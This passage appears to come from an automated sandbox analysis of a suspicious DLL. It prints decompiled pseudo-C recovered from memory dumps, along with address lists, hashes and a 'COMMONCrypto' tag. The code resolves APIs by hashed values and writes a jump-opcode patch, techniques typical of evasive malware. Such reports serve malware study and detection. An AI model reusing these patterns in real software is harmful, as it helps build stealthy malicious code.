							_t600 = E6FC4A5A4( &_v540, __eflags);
							_v420 = _t860;
							_t950 = _t600;
							__eflags = _t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t877 =  &_v416;
							_t604 =  *_t877 + 1;
							 *_t877 = _t604;
							__eflags = _t604 - 0xa;
							if(_t604 != 0xa) {
								continue;
							}
							goto L50;
						}
						asm("cdq");
						asm("movd xmm1, eax");
						_v416 =  *((intOrPtr*)(_t955 + 0x1a4));
						_t647 =  &_v408;
						asm("movd xmm0, edx");
						asm("punpckldq xmm1, xmm0");
						 *_t647 = 0;
						 *((intOrPtr*)(_t647 - 4)) = _v188;
						asm("movq [edx], xmm1");
						_t544 = E6FC53BA0(_t951, _t647 - 8, __eflags,  &(_t647[0x48]), 0x40, _t647);
						__eflags = _t544;
						if(_t544 != 0) {
							goto L50;
						}
						_v180 = 0;
						while(1) {
							_t863 = _v184;
							__eflags = E6FC4AD68(_t863, _t950, _v420,  *((intOrPtr*)(_t955 + 0x1a8)), _v188);
							if(__eflags != 0) {
								break;
							}
							_t595 = E6FC4A5A4( &_v540, __eflags);
							_v420 = _t863;
							_t950 = _t595;
							__eflags = _t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t876 =  &_v180;
							_t599 =  *_t876 + 1;
							 *_t876 = _t599;
							__eflags = _t599 - 0xa;
							if(_t599 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v184 = 0;
						while(1) {
							_t546 = E6FC4F558( &_v404, 0);
							_push(E6FC4F568( &_v408));
							_push(_v192);
							_push(_v144);
							_push(_v424);
							_push(_t950);
							_t864 = _t546;
							__eflags = E6FC4A298( &_v544, _t864);
							if(__eflags != 0) {
								break;
							}
							_t590 = E6FC4A5A4( &_v560, __eflags);
							_v440 = _t864;
							_t950 = _t590;
							__eflags = _t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t875 =  &_v204;
							_t594 =  *_t875 + 1;
							 *_t875 = _t594;
							__eflags = _t594 - 0xa;
							if(_t594 != 0xa) {
								continue;
							}
							goto L50;
						}
						_t550 = E6FC53BA0(_t951,  &_v428 - 8, __eflags,  &_v428 + 0x120, _v428,  &_v428);
						__eflags = _t550;
						if(_t550 != 0) {
							goto L50;
						}
						E6FC4F620( &_v208, 0);
						_v100 = 0xe9;
						E6FC4F578( &_v100 - 0x70, __eflags,  &_v100, 1);
						_t650 =  &_v104;
						_t556 = _v172 -  *((intOrPtr*)(_t650 - 0x54)) + 0xfffffffb;
						__eflags = _t556;
						 *_t650 = _t556;
						E6FC4F578(_t650 - 0x74, __eflags, _t650, 4);
						_t907 =  &_v448;
						asm("movq xmm0, [0x6fc5b798]");
						 *((intOrPtr*)(_t907 - 8)) = _v196;
						 *((intOrPtr*)(_t907 - 4)) =  *((intOrPtr*)(_t907 + 0x110));
						asm("movq [ebx], xmm0");
						E6FC53BA0(_t951, _t907 + 0x120 - 0x128, __eflags, _t907 + 0x120, 0x40, _t907);
						_v192 = 0;
						while(1) {
							_t561 = E6FC4F558( &_v208, 0);
							_push(E6FC4F568( &_v212));
							_push(_v160);
							_push(_v180);
							_push(_v444);
							_push(_t950);
							_t867 = _t561;
							__eflags = E6FC4A298( &_v564, _t867);
							if(__eflags != 0) {
								break;
							}
							_t585 = E6FC4A5A4( &_v580, __eflags);
							_v460 = _t867;
							_t950 = _t585;
							__eflags = _t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff) == 0) {
								L49:
								E6FC4F6F0(_t955 + 0x174);
								goto L50;
							}
							_t874 =  &_v180;
							_t589 =  *_t874 + 1;
							 *_t874 = _t589;
							__eflags = _t589 - 0xa;
							if(_t589 != 0xa) {
								continue;
							}
							goto L49;
						}
						_v180 = 0;
						while(1) {
							_t955 = _t955 + 0xffffffd8;
							asm("pxor xmm0, xmm0");
							_v640 = _t950;
							_v636 = _v460;
							_t868 = _v196;
							_v632 = _t868;
							_v628 = _v176;
							_t806 =  &_v580;
							_v624 =  *((intOrPtr*)(_t806 + 0x198));
							_v620 =  *((intOrPtr*)(_t806 + 0x184));
							asm("movq [esp+0x18], xmm0");
							asm("movq [esp+0x20], xmm0");
							__eflags = E6FC4AD04(__eflags);
							if(__eflags != 0) {
								break;
							}
							_t579 = E6FC4A5A4( &_v616, __eflags);
							_v496 = _t868;
							_t950 = _t579;
							__eflags = _t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff) == 0) {
								goto L49;
							}
							_t872 =  &_v216;
							_t584 =  *_t872 + 1;
							 *_t872 = _t584;
							__eflags = _t584 - 0xa;
							if(__eflags != 0) {
								continue;
							}
							goto L49;
						}
						_push(0);
						_t869 = _v164;
						__eflags = _t869;
						_t870 =  !=  ? _t869 + 0xc : _t869;
						_push( !=  ? _t869 + 0xc : _t869);
						_t567 = E6FC4C3A8(_t869,  &_v416, 0x2710);
						E6FC4F6F0(_t955 + 0x184);
						E6FC4B608( &_v448);
						E6FC4CDE0( &_v416, __eflags);
						E6FC4F6F0( &_v480);
						E6FC4F6F0( &_v464);
						E6FC4F6F0( &_v432);
						E6FC4F6F0( &_v632);
						E6FC4B680( &_v592);
						E6FC4F6F0( &_v608);
						__eflags = _t567;
						return 0 | _t567 == 0x00000000;
					}
					_v388 = 0;
					do {
						E6FC4F620(_t955 + 0x188, 0);
						_push(0x23627913);
						_push(_t955 + 0x1cc);
						E6FC51D00();
						E6FC4DD7C(_t955 + 0x1d0 - 8, _t955 + 0x1d0);
						_t879 = 0x7fffffff;
						E6FC4F578( &_v168, __eflags, _v92, E6FC4E94C(_v92, 0x7fffffff));
						E6FC4E054( &_v100);
						E6FC4D098( &_v108);
						_t836 =  &_v176;
						_t665 =  *((intOrPtr*)(_t836 + 0x28));
						 *((intOrPtr*)(_t836 - 0xf0)) = _v156;
						__eflags = E6FC4F568(_t836);
						if(__eflags <= 0) {
							L12:
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0xac]");
							asm("pxor xmm1, xmm1");
							_t837 =  &_v528;
							_v588 = _t950;
							_v584 =  *((intOrPtr*)(_t837 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v572 =  *((intOrPtr*)(_t837 + 0x198));
							_v568 =  *((intOrPtr*)(_t837 + 0x184));
							asm("movq [esp+0x18], xmm1");
							asm("movq [esp+0x20], xmm1");
							_t622 = E6FC4AD04(__eflags);
							__eflags = _t622;
							if(_t622 != 0) {
								E6FC5218C(0x3e8, _t879, _t950);
								E6FC4F6F0( &_v196);
								E6FC4ADB8( &_v564,  &(( &_v172)[5]), __eflags,  &_v172);
								_t881 =  &_v176;
								__eflags =  *_t881 | _t881[1];
								if(__eflags != 0) {
									goto L18;
								}
								_t629 = E6FC4A5A4( &_v564, __eflags);
								_v444 = _t881;
								_t950 = _t629;
								__eflags = _t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff;
								if((_t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff) == 0) {
									goto L50;
								}
								goto L16;
							}
							L13:
							E6FC4F6F0( &_v196);
							goto L50;
						}
						_v404 = 0;
						while(1) {
							_t635 = E6FC4F558( &_v160, _v404);
							_t879 = _t635;
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0x94]");
							_t844 =  &_v532;
							asm("movq xmm1, [0x6fc5b790]");
							_v592 = _t950;
							_v588 =  *((intOrPtr*)(_t844 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v576 = _t665;
							_v572 =  *((intOrPtr*)(_t844 + 0x80));
							_v568 =  *_t635 & 0x000000ff;
							_v564 = 0;
							asm("movq [esp+0x20], xmm1");
							_t638 = E6FC4AD04(__eflags);
							__eflags = _t638;
							if(_t638 == 0) {
								goto L13;
							}
							_t845 = 0x64;
							E6FC5218C(_t845, _t879, _t950);
							_t665 = _t665 + 1;
							asm("adc dword [ecx-0xf0], 0x0");
							 *((intOrPtr*)( &_v196 - 0xf4)) =  *((intOrPtr*)( &_v196 - 0xf4)) + 1;
							__eflags = E6FC4F568( &_v196) - _v440;
							if(__eflags > 0) {
								continue;
							}
							goto L12;
						}
						goto L13;
						L16:
						_t882 =  &_v432;
						_t633 =  *_t882 + 1;
						 *_t882 = _t633;
						__eflags = _t633 - 0xa;
					} while (_t633 != 0xa);
					goto L50;
				}
				L1:
				E6FC4F6F0( &_v532);
				E6FC4B680( &_v492);
				E6FC4F6F0( &_v508);
				return 0;
			}

0x6fc49144
0x6fc49148
0x6fc4914e
0x6fc49150
0x6fc49161
0x6fc49164
0x6fc4916b
0x6fc49174
0x6fc4917b
0x6fc4917f
0x6fc49188
0x6fc4918f
0x6fc49197
0x6fc4919c
0x6fc491ab
0x6fc491af
0x6fc491c4
0x6fc491da
0x6fc491e8
0x6fc491e9
0x6fc491ea
0x6fc491eb
0x6fc491ec
0x6fc491f3
0x6fc491f7
0x6fc49201
0x6fc49216
0x6fc4922c
0x6fc4923a
0x6fc4923b
0x6fc4923c
0x6fc4923d
0x6fc4923e
0x6fc49245
0x6fc49249
0x6fc49253
0x6fc49268
0x6fc4927e
0x6fc4928c
0x6fc4928d
0x6fc4928e
0x6fc4928f
0x6fc49290
0x6fc49297
0x6fc4929b
0x6fc492a5
0x6fc492ba
0x6fc492d0
0x6fc492de
0x6fc492df
0x6fc492e0
0x6fc492e1
0x6fc492e2
0x6fc492e9
0x6fc492ed
0x6fc492f7
0x6fc4930c
0x6fc49322
0x6fc49330
0x6fc49331
0x6fc49332
0x6fc49333
0x6fc49334
0x6fc4933b
0x6fc4933f
0x6fc49349
0x6fc4935e
0x6fc49374
0x6fc49382
0x6fc49383
0x6fc49384
0x6fc49385
0x6fc4938e
0x6fc49390
0x6fc4939b
0x6fc493a0
0x6fc493a5
0x6fc493b1
0x6fc493b6
0x6fc493bb
0x6fc493c7
0x6fc493cc
0x6fc493d1
0x6fc493dd
0x6fc493e2
0x6fc493e7
0x6fc493f3
0x6fc493f8
0x6fc493fd
0x6fc49409
0x6fc4940e
0x6fc4941a
0x6fc49420
0x6fc49430
0x6fc49435
0x6fc4943e
0x6fc49447
0x6fc4947e
0x6fc49487
0x6fc4948c
0x6fc49497
0x6fc494a1
0x6fc494a7
0x6fc494b9
0x6fc494cf
0x6fc494dd
0x6fc494de
0x6fc494df
0x6fc494e0
0x6fc494e1
0x6fc494e8
0x6fc494f2
0x6fc494f8
0x6fc4950a
0x6fc49520
0x6fc4952e
0x6fc4952f
0x6fc49530
0x6fc49531
0x6fc49532
0x6fc49539
0x6fc49543
0x6fc49549
0x6fc4955b
0x6fc49571
0x6fc4957f
0x6fc49580
0x6fc49581
0x6fc49582
0x6fc49583
0x6fc49586
0x6fc49589
0x6fc4959f
0x6fc495a4
0x6fc495a8
0x6fc495b3
0x6fc495b8
0x6fc495bd
0x6fc495c9
0x6fc495ce
0x6fc495d3
0x6fc495e7
0x6fc495ef
0x6fc495f6
0x6fc49606
0x6fc49614
0x6fc49620
0x6fc49622
0x6fc49629
0x6fc4963c
0x6fc49643
0x6fc4965c
0x6fc4966a
0x6fc49681
0x6fc4968f
0x6fc49694
0x6fc496a0
0x6fc496ad
0x6fc496b4
0x6fc496c9
0x6fc496ce
0x6fc496d5
0x6fc496dc
0x6fc496e3
0x6fc4a1d7
0x6fc4a1de
0x6fc4a1ea
0x6fc4a1f6
0x00000000
0x6fc4a1f6
0x6fc496f0
0x6fc496f7
0x00000000
0x00000000
0x6fc4970c
0x6fc49711
0x6fc49722
0x6fc49727
0x6fc49733
0x6fc4973a
0x6fc49740
0x6fc49745
0x6fc49748
0x6fc4974e
0x6fc4975c
0x6fc4975d
0x6fc49761
0x6fc49765
0x6fc49769
0x6fc4977e
0x6fc49789
0x6fc4978a
0x6fc4978e
0x6fc49792
0x6fc49796
0x6fc497a0
0x6fc497b6
0x6fc497b7
0x6fc497bb
0x6fc497bf
0x6fc497c3
0x6fc497df
0x6fc497f5
0x6fc497f5
0x6fc497fb
0x6fc497fd
0x6fc49800
0x6fc49805
0x6fc4980c
0x6fc49810
0x6fc49814
0x6fc4981a
0x6fc49820
0x6fc49832
0x6fc49848
0x6fc49856
0x6fc49857
0x6fc49858
0x6fc49859
0x6fc4985a
0x6fc49861
0x6fc4986b
0x6fc49871
0x6fc49883
0x6fc49899
0x6fc498a7
0x6fc498a8
0x6fc498a9
0x6fc498aa
0x6fc498ab
0x6fc498b2
0x6fc498bc
0x6fc498c2
0x6fc498d4
0x6fc498ea
0x6fc498f8
0x6fc498f9
0x6fc498fa
0x6fc498fb
0x6fc498fc
0x6fc49903
0x6fc4990d
0x6fc49913
0x6fc49925
0x6fc4993b
0x6fc49949
0x6fc4994a
0x6fc4994b
0x6fc4994c
0x6fc4994d
0x6fc49950
0x6fc49954
0x6fc49958
0x6fc4995e
0x6fc49964
0x6fc49976
0x6fc4998c
0x6fc4999a
0x6fc4999b
0x6fc4999c
0x6fc4999d
0x6fc4999e
0x6fc499a5
0x6fc499af
0x6fc499b5
0x6fc499c7
0x6fc499dd
0x6fc499eb
0x6fc499ec
0x6fc499ed
0x6fc499ee
0x6fc499ef
0x6fc499f6
0x6fc49a00
0x6fc49a06
0x6fc49a18
0x6fc49a2e
0x6fc49a3c
0x6fc49a3d
0x6fc49a3e
0x6fc49a3f
0x6fc49a40
0x6fc49a47
0x6fc49a51
0x6fc49a57
0x6fc49a69
0x6fc49a7f
0x6fc49a8d
0x6fc49a8e
0x6fc49a8f
0x6fc49a90
0x6fc49a96
0x6fc49a99
0x6fc49a9b
0x6fc49aa6
0x6fc49aab
0x6fc49ab0
0x6fc49abf
0x6fc49ac4
0x6fc49ac9
0x6fc49ad8
0x6fc49add
0x6fc49ae2
0x6fc49af1
0x6fc49af6
0x6fc49afb
0x6fc49b0a
0x6fc49b0f
0x6fc49b14
0x6fc49b23
0x6fc49b28
0x6fc49b2d
0x6fc49b3c
0x6fc49b41
0x6fc49b46
0x6fc49b55
0x6fc49b5a
0x6fc49b63
0x6fc49b6b
0x6fc49b70
0x6fc49b77
0x6fc49b84
0x6fc49b86
0x6fc4a1bf
0x6fc4a1c6
0x6fc4a1d2
0x00000000
0x6fc4a1d2
0x6fc49b8c
0x6fc49b95
0x6fc49b98
0x6fc49db0
0x6fc49db0
0x6fc49dbb
0x6fc49ddf
0x6fc49de1
0x00000000
0x00000000
0x6fc49de7
0x6fc49dec
0x6fc49df3
0x6fc49e00
0x6fc49e02
0x00000000
0x00000000
0x6fc49e08
0x6fc49e11
0x6fc49e12
0x6fc49e14
0x6fc49e17
0x00000000
0x00000000
0x00000000
0x6fc49e19
0x6fc49e1e
0x6fc49e29
0x6fc49e29
0x6fc49e2e
0x6fc49e35
0x6fc49e3c
0x6fc49e43
0x6fc49e48
0x6fc49e53
0x6fc49e55
0x00000000
0x00000000
0x6fc49e5b
0x6fc49e60
0x6fc49e67
0x6fc49e74
0x6fc49e76
0x00000000
0x00000000
0x6fc49e7c
0x6fc49e85
0x6fc49e86
0x6fc49e88
0x6fc49e8b
0x00000000
0x00000000
0x00000000
0x6fc49e8d
0x6fc49e9b
0x6fc49ea3
0x6fc49eae
0x6fc49eb5
0x6fc49ebc
0x6fc49ec0
0x6fc49ec4
0x6fc49eca
0x6fc49ed5
0x6fc49ee0
0x6fc49ee5
0x6fc49ee7
0x00000000
0x00000000
0x6fc49eed
0x6fc49ef8
0x6fc49f0e
0x6fc49f1e
0x6fc49f20
0x00000000
0x00000000
0x6fc49f26
0x6fc49f2b
0x6fc49f32
0x6fc49f3f
0x6fc49f41
0x00000000
0x00000000
0x6fc49f47
0x6fc49f50
0x6fc49f51
0x6fc49f53
0x6fc49f56
0x00000000
0x00000000
0x00000000
0x6fc49f58
0x6fc49f5d
0x6fc49f68
0x6fc49f71
0x6fc49f84
0x6fc49f85
0x6fc49f8c
0x6fc49f93
0x6fc49f9a
0x6fc49f9b
0x6fc49fa6
0x6fc49fa8
0x00000000
0x00000000
0x6fc49fae
0x6fc49fb3
0x6fc49fba
0x6fc49fc7
0x6fc49fc9
0x00000000
0x00000000
0x6fc49fcf
0x6fc49fd8
0x6fc49fd9
0x6fc49fdb
0x6fc49fde
0x00000000
0x00000000
0x00000000
0x6fc49fe0
0x6fc4a000
0x6fc4a005
0x6fc4a007
0x00000000
0x00000000
0x6fc4a016
0x6fc4a022
0x6fc4a02d
0x6fc4a039
0x6fc4a043
0x6fc4a043
0x6fc4a046
0x6fc4a04e
0x6fc4a05a
0x6fc4a069
0x6fc4a071
0x6fc4a074
0x6fc4a07d
0x6fc4a08d
0x6fc4a092
0x6fc4a09d
0x6fc4a0a6
0x6fc4a0b9
0x6fc4a0ba
0x6fc4a0c1
0x6fc4a0c8
0x6fc4a0cf
0x6fc4a0d0
0x6fc4a0db
0x6fc4a0dd
0x00000000
0x00000000
0x6fc4a0e3
0x6fc4a0e8
0x6fc4a0ef
0x6fc4a0fa
0x6fc4a0fc
0x6fc4a1b3
0x6fc4a1ba
0x00000000
0x6fc4a1ba
0x6fc4a102
0x6fc4a10b
0x6fc4a10c
0x6fc4a10e
0x6fc4a111
0x00000000
0x00000000
0x00000000
0x6fc4a113
0x6fc4a118
0x6fc4a123
0x6fc4a123
0x6fc4a126
0x6fc4a12a
0x6fc4a134
0x6fc4a138
0x6fc4a13f
0x6fc4a14a
0x6fc4a14e
0x6fc4a158
0x6fc4a162
0x6fc4a166
0x6fc4a16c
0x6fc4a177
0x6fc4a179
0x00000000
0x00000000
0x6fc4a183
0x6fc4a188
0x6fc4a18f
0x6fc4a19a
0x6fc4a19c
0x00000000
0x00000000
0x6fc4a19e
0x6fc4a1a7
0x6fc4a1a8
0x6fc4a1aa
0x6fc4a1ad
0x00000000
0x00000000
0x00000000
0x6fc4a1ad
0x6fc4a200
0x6fc4a202
0x6fc4a209
0x6fc4a20e
0x6fc4a211
0x6fc4a21f
0x6fc4a230
0x6fc4a23c
0x6fc4a248
0x6fc4a254
0x6fc4a260
0x6fc4a26c
0x6fc4a275
0x6fc4a27e
0x6fc4a287
0x6fc4a28e
0x00000000
0x6fc4a290
0x6fc49b9e
0x6fc49ba9
0x6fc49bb2
0x6fc49bb7
0x6fc49bc3
0x6fc49bc4
0x6fc49bd4
0x6fc49be2
0x6fc49bf5
0x6fc49c01
0x6fc49c0d
0x6fc49c19
0x6fc49c20
0x6fc49c23
0x6fc49c2e
0x6fc49c30
0x6fc49cdb
0x6fc49cdb
0x6fc49cde
0x6fc49ce7
0x6fc49ceb
0x6fc49cef
0x6fc49cf5
0x6fc49cf9
0x6fc49d05
0x6fc49d0f
0x6fc49d13
0x6fc49d19
0x6fc49d1f
0x6fc49d24
0x6fc49d26
0x6fc49d3e
0x6fc49d4a
0x6fc49d5e
0x6fc49d63
0x6fc49d6c
0x6fc49d6f
0x00000000
0x00000000
0x6fc49d75
0x6fc49d7a
0x6fc49d81
0x6fc49d8e
0x6fc49d90
0x00000000
0x00000000
0x00000000
0x6fc49d90
0x6fc49d28
0x6fc49d2f
0x00000000
0x6fc49d2f
0x6fc49c36
0x6fc49c41
0x6fc49c4f
0x6fc49c54
0x6fc49c56
0x6fc49c59
0x6fc49c62
0x6fc49c66
0x6fc49c6e
0x6fc49c74
0x6fc49c78
0x6fc49c7e
0x6fc49c8b
0x6fc49c8f
0x6fc49c93
0x6fc49c9b
0x6fc49ca1
0x6fc49ca6
0x6fc49ca8
0x00000000
0x00000000
0x6fc49cac
0x6fc49cad
0x6fc49cb2
0x6fc49cbc
0x6fc49cc3
0x6fc49cce
0x6fc49cd5
0x00000000
0x00000000
0x00000000
0x6fc49cd5
0x00000000
0x6fc49d96
0x6fc49d96
0x6fc49d9f
0x6fc49da0
0x6fc49da2
0x6fc49da2
0x00000000
0x6fc49dab
0x6fc49449
0x6fc4944d
0x6fc49456
0x6fc4945f
0x00000000

Strings

$EA, xrefs: 6FC491E1

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $EA
API String ID: 0-4251458306
Opcode ID: 74214b7a2ce6981607bc6a51c6190a593544b8b5c74ee2032e571a943c58d043
Instruction ID: 44232c2d9bd9a0dab350db402404f1500dd8e188113810dd5e3e940890c52f33
Opcode Fuzzy Hash: 74214b7a2ce6981607bc6a51c6190a593544b8b5c74ee2032e571a943c58d043
Instruction Fuzzy Hash: A3A279719087419FD725DF24C890BDFB7F4AF96304F008A2DA4999B2A1FF31A949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6FC4A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6FC4A5A4(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6FC4B714(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6FC4F56C(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6FC4F6F0(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6FC5218C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6FC4F6F0(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6FC4F620(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6FC4F620(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6fc5b7a8]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6FC52F8C(0xa5eabdf8, 0xd1a06a90);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6FC4F558( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6FC4F558( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6FC4B680(_t439 + 0x34);
											E6FC4B680(_t439 + 8);
											goto L65;
										}
										L62:
										E6FC4B680(_t439 + 0x34);
										E6FC4B680(_t439 + 8);
										goto L63;
									}
									_t392 = E6FC4F558(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6FC4CB48(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6FC4C33C(_t324);
									if(__eflags != 0) {
										break;
									}
									E6FC4F8C4(_t439 + 0x14, E6FC4F568(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6FC4F558(_t439 + 0x14, E6FC4F568(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6FC52F8C(0xa5eabdf8, 0xf3119fba);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6FC4F8C4(_t439 + 0x40, E6FC4F568(_t439 + 0x3c) + 4);
											 *(E6FC4F558(_t439 + 0x40, E6FC4F568(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6FC4CDE0(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6FC4F558( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6FC4F558(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6FC4AD04(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6FC4CDE0(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6FC4F558( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6FC4F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6FC4F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6FC4F558( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6FC4F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6FC5382C( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6FC4F568( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6FC4F8C4( *((intOrPtr*)(_t439 + 8)), E6FC4F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6FC4F568( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6FC4F568( *_t439);
